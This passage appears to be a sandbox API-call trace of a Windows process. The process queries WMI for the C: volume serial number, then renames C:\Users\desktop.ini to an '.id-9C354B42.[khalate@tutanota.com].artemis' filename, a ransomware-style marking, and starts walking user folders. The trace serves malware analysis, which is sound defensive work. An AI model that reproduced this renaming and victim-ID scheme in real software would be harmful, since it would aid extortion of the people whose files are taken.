puCount=0x71ef24c*=0x0) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738150, uRequestedInfo=0x0, puResponse=0x71ef254 | out: puResponse=0x71ef254*=0xc19) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738150, uRequestedInfo=0x0, puResponse=0x71ef254 | out: puResponse=0x71ef254*=0xc19) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738150, puCount=0x71ef1cc | out: puCount=0x71ef1cc*=0x0) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef1b8 | out: puCount=0x71ef1b8*=0x2) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef1b4*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1b4*=0xf, pszText=0x0) returned 0x0 [0148.203] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef1b4*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1b4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.203] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef168 | out: ppv=0x71ef168*=0x72015c) returned 0x0 [0148.203] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef160 | out: pAptType=0x71ef160*=1) returned 0x0 [0148.204] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef164 | out: ppvObject=0x71ef164*=0x0) returned 0x80004002 [0148.204] IUnknown:Release (This=0x72015c) returned 0x1 [0148.204] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eead0 | out: ppv=0x71eead0*=0x6736fa8) returned 0x0 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736fa8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eece8 | out: ppvObject=0x71eece8*=0x0) returned 0x80004002 [0148.205] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736fa8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecfc | out: ppvObject=0x71eecfc*=0x67380e0) returned 0x0 [0148.205] WbemDefPath:IUnknown:Release (This=0x6736fa8) returned 0x0 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee91c | out: ppvObject=0x71ee91c*=0x67380e0) returned 0x0 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee8d8 | out: ppvObject=0x71ee8d8*=0x0) returned 0x80004002 [0148.205] WbemDefPath:IUnknown:AddRef (This=0x67380e0) returned 0x3 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee234 | out: ppvObject=0x71ee234*=0x0) returned 0x80004002 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0148.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1f0 | out: ppvObject=0x71ee1f0*=0x77db88) returned 0x0 [0148.205] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1f8 | out: pCid=0x71ee1f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.205] WbemDefPath:IUnknown:Release (This=0x77db88) returned 0x3 [0148.205] CoGetContextToken (in: pToken=0x71ee250 | out: pToken=0x71ee250) returned 0x0 [0148.205] CoGetContextToken (in: pToken=0x71ee658 | out: pToken=0x71ee658) returned 0x0 [0148.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee6e8 | out: ppvObject=0x71ee6e8*=0x0) returned 0x80004002 [0148.206] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x2 [0148.206] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x1 [0148.206] CoGetContextToken (in: pToken=0x71eefe0 | out: pToken=0x71eefe0) returned 0x0 [0148.206] CoGetContextToken (in: pToken=0x71eef40 | out: pToken=0x71eef40) returned 0x0 [0148.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x71ef010*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef00c | out: ppvObject=0x71ef00c*=0x67380e0) returned 0x0 [0148.206] WbemDefPath:IUnknown:AddRef (This=0x67380e0) returned 0x3 [0148.206] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x2 [0148.206] WbemDefPath:IWbemPath:SetText (This=0x67380e0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.206] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67380e0, puCount=0x71ef190 | out: puCount=0x71ef190*=0x2) returned 0x0 [0148.206] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=4, puBuffLength=0x71ef18c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef18c*=0xf, pszText=0x0) returned 0x0 [0148.206] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=4, puBuffLength=0x71ef18c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef18c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.206] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef190 | out: ppv=0x71ef190*=0x72015c) returned 0x0 [0148.206] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef188 | out: pAptType=0x71ef188*=1) returned 0x0 [0148.206] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef18c | out: ppvObject=0x71ef18c*=0x0) returned 0x80004002 [0148.206] IUnknown:Release (This=0x72015c) returned 0x1 [0148.207] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eedb0 | out: ppv=0x71eedb0*=0x672f1f0) returned 0x0 [0148.207] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eefc8 | out: ppvObject=0x71eefc8*=0x0) returned 0x80004002 [0148.207] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eefdc | out: ppvObject=0x71eefdc*=0x6736fb8) returned 0x0 [0148.207] WbemLocator:IUnknown:Release (This=0x672f1f0) returned 0x0 [0148.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebfc | out: ppvObject=0x71eebfc*=0x6736fb8) returned 0x0 [0148.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eebb8 | out: ppvObject=0x71eebb8*=0x0) returned 0x80004002 [0148.208] WbemLocator:IUnknown:AddRef (This=0x6736fb8) returned 0x3 [0148.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee514 | out: ppvObject=0x71ee514*=0x0) returned 0x80004002 [0148.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0148.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee4d0 | out: ppvObject=0x71ee4d0*=0x0) returned 0x80004002 [0148.208] CoGetContextToken (in: pToken=0x71ee530 | out: pToken=0x71ee530) returned 0x0 [0148.208] CoGetContextToken (in: pToken=0x71ee938 | out: pToken=0x71ee938) returned 0x0 [0148.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee9c8 | out: ppvObject=0x71ee9c8*=0x0) returned 0x80004002 [0148.208] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x2 [0148.208] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x1 [0148.208] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0148.208] CoGetContextToken (in: pToken=0x71eef08 | out: pToken=0x71eef08) returned 0x0 [0148.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736fb8, riid=0x71eefd8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eefd4 | out: ppvObject=0x71eefd4*=0x6736fb8) returned 0x0 [0148.208] WbemLocator:IUnknown:AddRef (This=0x6736fb8) returned 0x3 [0148.208] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x2 [0148.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67380e0, puCount=0x71ef16c | out: puCount=0x71ef16c*=0x2) returned 0x0 [0148.208] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=8, puBuffLength=0x71ef168*=0x0, pszText=0x0 | out: puBuffLength=0x71ef168*=0xf, pszText=0x0) returned 0x0 [0148.208] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=8, puBuffLength=0x71ef168*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef168*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.208] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71ef044 | out: ppv=0x71ef044*=0x6736fc8) returned 0x0 [0148.208] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736fc8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef0d8 | out: ppNamespace=0x71ef0d8*=0x6737274) returned 0x0 [0149.232] WbemLocator:IUnknown:QueryInterface (in: This=0x6737274, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef74 | out: ppvObject=0x71eef74*=0x781364) returned 0x0 [0149.232] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781364, pProxy=0x6737274, pAuthnSvc=0x71eefc4, pAuthzSvc=0x71eefc0, pServerPrincName=0x71eefb8, pAuthnLevel=0x71eefbc, pImpLevel=0x71eefac, pAuthInfo=0x71eefb0, pCapabilites=0x71eefb4 | out: pAuthnSvc=0x71eefc4*=0xa, pAuthzSvc=0x71eefc0*=0x0, pServerPrincName=0x71eefb8, pAuthnLevel=0x71eefbc*=0x6, pImpLevel=0x71eefac*=0x2, pAuthInfo=0x71eefb0, pCapabilites=0x71eefb4*=0x1) returned 0x0 [0149.232] WbemLocator:IUnknown:Release (This=0x781364) returned 0x1 [0149.232] WbemLocator:IUnknown:QueryInterface (in: This=0x6737274, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef68 | out: ppvObject=0x71eef68*=0x781384) returned 0x0 [0149.232] WbemLocator:IUnknown:QueryInterface (in: This=0x6737274, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef64 | out: ppvObject=0x71eef64*=0x781364) returned 0x0 [0149.232] WbemLocator:IClientSecurity:SetBlanket (This=0x781364, pProxy=0x6737274, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0149.232] WbemLocator:IUnknown:Release (This=0x781364) returned 0x2 [0149.232] WbemLocator:IUnknown:Release (This=0x781384) returned 0x1 [0149.232] CoTaskMemFree (pv=0x77e058) [0149.232] WbemLocator:IUnknown:Release (This=0x6736fc8) returned 0x0 [0149.233] WbemLocator:IUnknown:QueryInterface (in: This=0x6737274, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb64 | out: ppvObject=0x71eeb64*=0x781384) returned 0x0 [0149.233] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb20 | out: ppvObject=0x71eeb20*=0x0) returned 0x80004002 [0149.233] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee93c | out: ppvObject=0x71ee93c*=0x0) returned 0x80004002 [0149.233] WbemLocator:IUnknown:AddRef (This=0x781384) returned 0x3 [0149.233] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee47c | out: ppvObject=0x71ee47c*=0x0) returned 0x80004002 [0149.234] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0149.234] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee438 | out: ppvObject=0x71ee438*=0x7812e4) returned 0x0 [0149.234] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7812e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee440 | out: pCid=0x71ee440*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0149.234] WbemLocator:IUnknown:Release (This=0x7812e4) returned 0x3 [0149.234] CoGetContextToken (in: pToken=0x71ee498 | out: pToken=0x71ee498) returned 0x0 [0149.234] CoGetContextToken (in: pToken=0x71ee8a0 | out: pToken=0x71ee8a0) returned 0x0 [0149.234] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee930 | out: ppvObject=0x71ee930*=0x78136c) returned 0x0 [0149.234] WbemLocator:IRpcOptions:Query (in: This=0x78136c, pPrx=0x781384, dwProperty=2, pdwValue=0x71ee958 | out: pdwValue=0x71ee958) returned 0x80004002 [0149.234] WbemLocator:IUnknown:Release (This=0x78136c) returned 0x3 [0149.234] WbemLocator:IUnknown:Release (This=0x781384) returned 0x2 [0149.234] CoGetContextToken (in: pToken=0x71eee78 | out: pToken=0x71eee78) returned 0x0 [0149.234] CoGetContextToken (in: pToken=0x71eedd8 | out: pToken=0x71eedd8) returned 0x0 [0149.234] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x71eeea8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eeea4 | out: ppvObject=0x71eeea4*=0x6737274) returned 0x0 [0149.235] WbemLocator:IUnknown:AddRef (This=0x6737274) returned 0x4 [0149.235] WbemLocator:IUnknown:Release (This=0x6737274) returned 0x3 [0149.235] WbemLocator:IUnknown:Release (This=0x6737274) returned 0x2 [0149.235] SysStringLen (param_1=0x0) returned 0x0 [0149.235] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738150, puCount=0x71ef23c | out: puCount=0x71ef23c*=0x0) returned 0x0 [0149.235] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef238*=0x0, pszText=0x0 | out: puBuffLength=0x71ef238*=0x20, pszText=0x0) returned 0x0 [0149.235] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef238*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef238*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.235] CoGetContextToken (in: pToken=0x71eeea8 | out: pToken=0x71eeea8) returned 0x0 [0149.235] WbemLocator:IUnknown:AddRef (This=0x781384) returned 0x3 [0149.235] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed3c | out: ppvObject=0x71eed3c*=0x781384) returned 0x0 [0149.235] WbemLocator:IUnknown:Release (This=0x781384) returned 0x3 [0149.235] WbemLocator:IUnknown:Release (This=0x781384) returned 0x2 [0149.235] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef240*=0x0, pszText=0x0 | out: puBuffLength=0x71ef240*=0x20, pszText=0x0) returned 0x0 [0149.235] WbemDefPath:IWbemPath:GetText (in: This=0x6738150, lFlags=2, puBuffLength=0x71ef240*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef240*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.235] IWbemServices:GetObject (in: This=0x6737274, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1f4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1f4*=0x673b138, ppCallResult=0x0) returned 0x0 [0150.819] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67380e0, puCount=0x71ef1f4 | out: puCount=0x71ef1f4*=0x2) returned 0x0 [0150.819] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=4, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0xf, pszText=0x0) returned 0x0 [0150.819] WbemDefPath:IWbemPath:GetText (in: This=0x67380e0, lFlags=4, puBuffLength=0x71ef1f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.819] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3420f7c*=0, plFlavor=0x3420f80*=0 | out: pVal=0x71ef1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3420f7c*=8, plFlavor=0x3420f80*=0) returned 0x0 [0150.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.820] IWbemClassObject:Get (in: This=0x673b138, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3420f7c*=8, plFlavor=0x3420f80*=0 | out: pVal=0x71ef1f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3420f7c*=8, plFlavor=0x3420f80*=0) returned 0x0 [0150.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.820] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini", nBufferLength=0x105, lpBuffer=0x71eedf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini", lpFilePart=0x0) returned 0x14 [0150.820] GetFullPathNameW (in: lpFileName="C:\\Users\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eedf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3f [0150.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef258) returned 1 [0150.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x71ef2d4 | out: lpFileInformation=0x71ef2d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0150.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef254) returned 1 [0150.821] MoveFileW (lpExistingFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\Users\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\desktop.ini.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0150.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef38c) returned 1 [0150.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x71eee94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0150.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x71eee68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0150.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x71ef0b4 | out: 